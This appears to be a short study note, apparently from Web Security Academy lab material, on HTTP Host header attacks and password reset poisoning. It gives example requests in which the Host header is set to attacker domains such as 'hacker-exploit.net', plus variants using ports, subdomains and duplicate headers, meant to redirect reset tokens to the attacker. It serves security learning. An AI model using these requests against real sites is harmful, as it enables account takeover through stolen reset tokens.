HTTP
The HTTP Host Header is a mandatory request header as of HTTP/1.1
# GET /home HTTP/1.1
# Host: web-security-academy.net/
# User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
<a href="https://_SERVER['HOST']/support">Contact support</a>
# Password reset email
Sent: 2022-05-01 15:03:47 +0000
From: "No reply" <web-security-academy.net>
To: "wiener" <wiener@web-security-academy.net>
Subject: Account recovery
Hello!
Please follow the link below to reset your password.
https://web-security-academy.net/
forgot-password?token=cjA5K7uMV7EJoZW05fJjgApuphV6pNKQ
Intercept
An can intercept the resulting HTTP request and modify the Host header.
# Burp Intercept
GET /email HTTP/1.1
Host: hacker-exploit.net # Look Here
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
# If the victim clicks this link ...
# or it is fetched by an antivirus scanner ...
# the password reset token will be delivered to the attacker's server.
Identify
Modify the Host header and still reach the target application with your request.
# Modify host
GET /example HTTP/1.1
Host: exploit-website.com # Look Here
# Modify port
GET /example HTTP/1.1
Host: vulnerable-website.com:9999
# Modify subdomain
GET /example HTTP/1.1
Host: hacked.vulnerable-website.com
# Duplicate host
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: exploit-website.com
Last update: 513 days ago
